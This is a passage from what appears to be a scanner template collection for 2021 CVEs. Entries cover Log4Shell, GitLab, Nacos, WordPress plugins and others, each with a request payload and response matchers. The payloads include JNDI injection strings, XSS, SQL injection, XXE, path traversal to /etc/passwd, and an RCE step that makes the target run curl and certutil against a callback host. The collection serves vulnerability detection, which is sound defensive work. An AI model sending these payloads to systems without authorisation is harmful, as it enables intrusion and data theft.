${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbearer.{{interactsh-url}}}\nCookie: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookievalue.{{interactsh-url}}}\nLocation: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.location.{{interactsh-url}}}\nOrigin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.origin.{{interactsh-url}}}\nReferer: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.referer.{{interactsh-url}}}\nUpgrade-Insecure-Requests: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}\nUser-Agent: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.useragent.{{interactsh-url}}}\nX-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}}\nX-CSRF-Token: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xcsrftoken.{{interactsh-url}}}\nX-Druid-Comment: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xdruidcomment.{{interactsh-url}}}\nX-Forwarded-For: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xforwardedfor.{{interactsh-url}}}\nX-Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xorigin.{{interactsh-url}}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"regex","part":"interactsh_request","regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]}],"extractors":[{"type":"kval","kval":null},{"type":"regex","group":2,"regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"},{"type":"regex","group":1,"regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-31589","info":{"name":"BeyondTrust Secure Remote Access Base <=6.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","bomgar"],"case-insensitive":true,"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29490","info":{"name":"Jellyfin 10.7.2 - Server Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Images/Remote?imageUrl=https://oast.me/","{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=https://oast.me/&ProviderName=TheMovieDB"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2021-44515","info":{"name":"Zoho ManageEngine Desktop Central - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /STATE_ID/123/agentLogUploader HTTP/1.1\nHost: {{Hostname}}\nCookie: STATE_COOKIE=&_REQS/_TIME/123\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body) == 0"]},{"type":"word","part":"header","words":["UEMJSESSIONID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39327","info":{"name":"WordPress BulletProof Security 5.1 Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/bps-backup/logs/db_backup_log.txt","{{BaseURL}}/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BPS DB BACKUP LOG","=================="],"condition":"and"},{"type":"regex","negative":true,"part":"body","regex":["^BPS\\sDB\\sBACKUP\\sLOG\\r\\n==================\\r\\n==================\\r\\n\\r\\n$"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43510","info":{"name":"Sourcecodester Simple Client Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin'+or+'1'%3d'1'--+-&password=as\n","GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers":[{"type":"dsl","dsl":["contains(header_1, \"text/html\")","status_code_1 == 200","contains(body_1, \"{\\\"status\\\":\\\"success\\\"}\")","contains(body_2, \"Welcome to Simple Client\")"],"condition":"and"}]}]},{"id":"CVE-2021-38146","info":{"name":"Wipro Holmes Orchestrator 20.4.1 - Arbitrary File Download","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/home/download"],"headers":{"Content-Type":"application/json"},"body":"{\n  \"SearchString\": \"C:/Windows/Win.ini\",\n  \"Msg\": \"\"\n}\n","matchers-condition":"and","matchers":[{"type":"word","words":["[fonts]","[extensions]","[files]"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32030","info":{"name":"ASUS GT-AC2900 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: asusrouter--\nReferer: {{BaseURL}}\nCookie: asus_token=\\0Invalid; clickedItem_tab=0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","words":["get_cfg_clientlist","alias","model_name"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26292","info":{"name":"AfterLogic Aurora and WebMail Pro < 7.7.9 - Full Path Disclosure","severity":"low"},"requests":[{"raw":["DELETE /dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["caldav_public_user","GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2021-24364","info":{"name":"WordPress Jannah Theme <5.4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/themes/jannah/assets/","attachment-jannah-image-"],"condition":"or"}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41878","info":{"name":"i-Panel Administration System 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22document.domain%22)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><img src=a onerror=alert(\"document.domain\")>","i-Panel Administration"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27651","info":{"name":"Pega Infinity - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/prweb/PRAuth/app/default/"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 8.5.2', '>= 8.2.1')"]},{"type":"word","part":"body","words":["Pega Infinity"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)<span>Pega ([0-9.]+)</span>"],"internal":true},{"type":"regex","group":1,"regex":["(?m)<span>Pega ([0-9.]+)</span>"]}]}]},{"id":"CVE-2021-41649","info":{"name":"PuneethReddyHC Online Shopping System homeaction.php SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/homeaction.php"],"body":"cat_id=4'&get_seleted_Category=1","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Warning: mysqli_num_rows() expects parameter 1 to be","xdebug-error xe-warning"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29441","info":{"name":"Nacos <1.4.1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nUser-Agent: Nacos-Server\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 403","status_code_2 == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body_1, 'Forbidden')","body_2 == 'true'"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2021-22053","info":{"name":"Spring Cloud Netflix Hystrix Dashboard <2.2.10 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(\"curl http://{{interactsh-url}}\")}__::.x/","{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(\"certutil -urlcache -split -f http://{{interactsh-url}}\")}__::.x/"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"regex","part":"interactsh_request","regex":["User-Agent: (curl|CertUtil)"]}]}]},{"id":"CVE-2021-24979","info":{"name":"Paid Memberships Pro < 2.6.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=pmpro-discountcodes&s=s\"+style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"style=animation-name:rotation+onanimationstart=alert(document.domain)//\")","contains(body_2, \"Paid Memberships Pro - Membership Plugin for WordPress\")"],"condition":"and"}]}]},{"id":"CVE-2021-24554","info":{"name":"WordPress Paytm Donation <=1.3.2 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin.php?page=wp_paytm_donation&action=delete&id=0%20AND%20(SELECT%205581%20FROM%20(SELECT(SLEEP(6)))Pjwy) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"paytm-settings_page_wp_paytm_donation\")"],"condition":"and"}]}]},{"id":"CVE-2021-22205","info":{"name":"GitLab CE/EE - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df","02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b","051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce","08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290","0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59","0a5b4edebfcb0a7be64edc06af410a6fbc6e3a65b76592a9f2bcc9afea7eb753","1084266bd81c697b5268b47c76565aa86b821126a6b9fe6ea7b50f64971fc96f","14c313ae08665f7ac748daef8a70010d2ea9b52fd0cae594ffa1ffa5d19c43f4","1626b2999241b5a658bddd1446648ed0b9cc289de4cc6e10f60b39681a0683c4","20f01320ba570c73e01af1a2ceb42987bcb7ac213cc585c187bec2370cf72eb6","27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959","292ca64c0c109481b0855aea6b883a588bd293c6807e9493fc3af5a16f37f369","2eaf7e76aa55726cc0419f604e58ee73c5578c02c9e21fdbe7ae887925ea92ae","30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f","318ee33e5d14035b04832fa07c492cdf57788adda50bb5219ef75b735cbf00e2","33313f1ff2602ef43d945e57e694e747eb00344455ddb9b2544491a3af2696a1","335f8ed58266e502d415f231f6675a32bb35cafcbaa279baa2c0400d4a9872ac","34031b465d912c7d03e815c7cfaff77a3fa7a9c84671bb663026d36b1acd3f86","3407a4fd892e9d5024f3096605eb1e25cad75a8bf847d26740a1e6a77e45b087","340c31a75c5150c5e501ec143849adbed26fed0da5a5ee8c60fb928009ea3b86","38981e26a24308976f3a29d6e5e2beef57c7acda3ad0d5e7f6f149d58fd09d3d","3963d28a20085f0725884e2dbf9b5c62300718aa9c6b4b696c842a3f4cf75fcd","39b154eeefef684cb6d56db45d315f8e9bf1b2cc86cf24d8131c674521f5b514","39fdbd63424a09b5b065a6cc60c9267d3f49950bf1f1a7fd276fe1ece4a35c09","3b51a43178df8b4db108a20e93a428a889c20a9ed5f41067d1a2e8224740838e","3cbf1ae156fa85f16d4ca01321e0965db8cfb9239404aaf52c3cebfc5b4493fb","40d8ac21e0e120f517fbc9a798ecb5caeef5182e01b7e7997aac30213ef367b3","4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1","450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54","455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8","4568941e60dbfda3472e3f745cd4287172d4e6cce44bed85390af9e4e2112d0b","45b2cf643afd34888294a073bf55717ea00860d6a1dca3d301ded1d0040cac44","473ef436c59830298a2424616d002865f17bb5a6e0334d3627affa352a4fc117","4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2","4a081f9e3a60a0e580cad484d66fbf5a1505ad313280e96728729069f87f856e","4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160","504940239aafa3b3a7b49e592e06a0956ecaab8dbd4a5ea3a8ffd920b85d42eb","52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c","530a8dd34c18ca91a31fbae2f41d4e66e253db0343681b3c9640766bf70d8edf","5440e2dd89d3c803295cc924699c93eb762e75d42178eb3fe8b42a5093075c71","62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51","64e10bc92a379103a268a90a7863903eacb56843d8990fff8410f9f109c3b87a","655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f","67ac5da9c95d82e894c9efe975335f9e8bdae64967f33652cd9a97b5449216d2","69a1b8e44ba8b277e3c93911be41b0f588ac7275b91a184c6a3f448550ca28ca","6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb","70ce56efa7e602d4b127087b0eca064681ecdd49b57d86665da8b081da39408b","7310c45f08c5414036292b0c4026f281a73cf8a01af82a81257dd343f378bbb5","73a21594461cbc9a2fb00fc6f94aec1a33ccf435a7d008d764ddd0482e08fc8d","77566acc818458515231d0a82c131a42890d771ea998b9f578dc38e0eb7e517f","78812856e55613c6803ecb31cc1864b7555bf7f0126d1dfa6f37376d37d3aeab","79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9","7b1dcbacca4f585e2cb98f0d48f008acfec617e473ba4fd88de36b946570b8b9","7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5","81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3","83dc10f687305b22e602ba806619628a90bd4d89be7c626176a0efec173ecff1","93ebf32a4bd988b808c2329308847edd77e752b38becc995970079a6d586c39b","969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e","9b4e140fad97320405244676f1a329679808e02c854077f73422bd8b7797476b","9c095c833db4364caae1659f4e4dcb78da3b5ec5e9a507154832126b0fe0f08e","a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528","a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9","ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5","ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8","aeddf31361633b3d1196c6483f25c484855e0f243e7f7e62686a4de9e10ec03b","b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711","b64a1277a08c2901915525143cd0b62d81a37de0a64ec135800f519cb0836445","bb1565ffd7c937bea412482ed9136c6057be50356f1f901379586989b4dfe2ca","be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a","bec9544b57b8b2b515e855779735ad31c3eacf65d615b4bfbd574549735111e7","bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4","bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218","c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4","c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c","d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71","d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb","d56f0577fbbbd6f159e9be00b274270cb25b60a7809871a6a572783b533f5a3c","d812b9bf6957fafe35951054b9efc5be6b10c204c127aa5a048506218c34e40f","dc6b3e9c0fad345e7c45a569f4c34c3e94730c33743ae8ca055aa6669ad6ac56","def1880ada798c68ee010ba2193f53a2c65a8981871a634ae7e18ccdcd503fa3","e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a","e4b6f040fe2e04c86ed1f969fc72710a844fe30c3501b868cb519d98d1fe3fd0","eb078ffe61726e3898dc9d01ea7955809778bde5be3677d907cbd3b48854e687","ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d","ed4780bb05c30e3c145419d06ad0ab3f48bd3004a90fb99601f40c5b6e1d90fd","ef53a4f4523a4a0499fb892d9fb5ddb89318538fef33a74ce0bf54d25777ea83","f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812","f7d1309f3caef67cb63bd114c85e73b323a97d145ceca7d6ef3c1c010078c649","f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2021-25111","info":{"name":"WordPress English Admin <1.5.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-40970","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[username]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-1499","info":{"name":"Cisco HyperFlex HX Data Platform - Arbitrary File Upload","severity":"medium"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Encoding: gzip, deflate\nContent-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583\nOrigin: {{RootURL}}\nReferer: {{RootURL}}\n\n-----------------------------253855577425106594691130420583\nContent-Disposition: form-data; name=\"file\"; filename=\"../../../../../tmp/passwd9\"\nContent-Type: application/json\n\nMyPasswdNewData->/api/tomcat\n\n-----------------------------253855577425106594691130420583--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{\"result\":","\"filename:","/tmp/passwd9"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25299","info":{"name":"Nagios XI 5.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&page=auth&debug=&pageopt=login&username={{username}}&password={{password}}&loginButton=\n","GET /nagiosxi/admin/sshterm.php?url=javascript:alert(document.domain) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"iframe src=\\\"javascript:alert(document.domain)\") && contains(body_3, \"SSH Terminal\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=\"nsp\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-41432","info":{"name":"FlatPress 1.2.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykGJmx9vKsePrMkVp\n\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"user\"\n\n{{username}}\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"pass\"\n\n{{password}}\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"submit\"\n\nLogin\n------WebKitFormBoundarykGJmx9vKsePrMkVp--\n","GET /admin.php?p=entry&action=write HTTP/1.1\nHost: {{Hostname}}\n","POST /admin.php?p=entry&action=write HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_wpnonce={{nonce}}&_wp_http_referer=%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=abcd&timestamp=&entry=&attachselect=--&imageselect=--&content=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&save=Publish\n","GET /index.php/2022/10 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_4, '<p><script>alert(document.cookie)</script></p>')","contains(body_4, 'FlatPress')","contains(header_4, 'text/html')","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-27931","info":{"name":"LumisXP <10.0.0 - Blind XML External Entity Attack","severity":"critical"},"requests":[{"raw":["POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1\nHost: {{Hostname}}\n\n<?xml version=\"1.0\" ?>\n<!DOCTYPE r [\n<!ELEMENT r ANY >\n<!ENTITY xxe SYSTEM \"http://{{interactsh-url}}\">\n]>\n<method name=\"addPage\">\n<id>&xxe;</id>\n</method>\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-39350","info":{"name":"FV Flowplayer Video Player WordPress plugin  - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=fv_player_stats&player_id=1</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","<h1>FV Player Stats</h1>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24320","info":{"name":"WordPress Bello Directory & Listing Theme <1.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/wp-content/themes/bello/readme.txt"],"stop-at-first-match":true,"matchers":[{"type":"word","internal":true,"words":["wp-content/themes/bello/fonts","bold-themes.com/bello"],"condition":"or"}]},{"method":"GET","path":["{{BaseURL}}/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24169","info":{"name":"WordPress Advanced Order Export For WooCommerce <3.1.8 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"woo-order-export-lite\")"],"condition":"and"}]}]},{"id":"CVE-2021-43831","info":{"name":"Gradio < 2.5.0 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/file/../../../../../../../../../../../../../../../../../..{{path}}"],"payloads":{"path":["/etc/passwd","/windows/win.ini"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22873","info":{"name":"Revive Adserver <5.1.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ads/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/openx/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/revive/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/www/delivery/lg.php?dest=http://interact.sh"],"stop-at-first-match":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-34640","info":{"name":"WordPress Securimage-WP-Fixed <=3.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET //wp-admin/options-general.php/\"></script><script>alert(document.domain)</script>/script%3E?page=securimage-wp-options%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27319","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-25120","info":{"name":"Easy Social Feed < 6.2.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: 